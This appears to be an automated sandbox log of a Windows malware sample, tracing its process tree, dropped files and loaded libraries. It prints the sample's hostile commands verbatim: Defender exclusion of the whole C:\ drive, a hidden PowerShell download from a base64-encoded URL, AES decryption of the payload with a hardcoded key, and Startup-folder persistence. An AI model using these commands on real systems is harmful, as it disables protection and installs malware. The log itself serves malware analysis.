Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Mutant created: \Sessions\1\BaseNamedObjects\{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4168:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\295B.tmp
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Command line argument: %s\explorer.exe | 13_2_00301000
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Command line argument: %s\svchost.exe | 13_2_00301000
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Command line argument: %s\cmd.exe | 13_2_00301000
Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: explorer.exe, explorer.exe, 00000012.00000002.2675679340.00000000023A8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: explorer.exe, explorer.exe, 00000012.00000002.2675679340.00000000023A8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: explorer.exe, explorer.exe, 00000012.00000002.2675679340.00000000023A8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: explorer.exe, 00000010.00000002.2934846757.0000000003930000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2015791571.00000000035FA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2675679340.00000000023A8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: explorer.exe, 00000012.00000003.2016856593.0000000002757000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2017112482.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2017151466.0000000002766000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | ReversingLabs: Detection: 34%
Source: file.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | File read: C:\Users\user\AppData\Local\Temp\downloaded_file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net session
Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
Source: C:\Windows\explorer.exe | Process created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net session
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
Source: C:\Windows\explorer.exe | Process created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\net.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe | Section loaded: logoncli.dll
                    Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
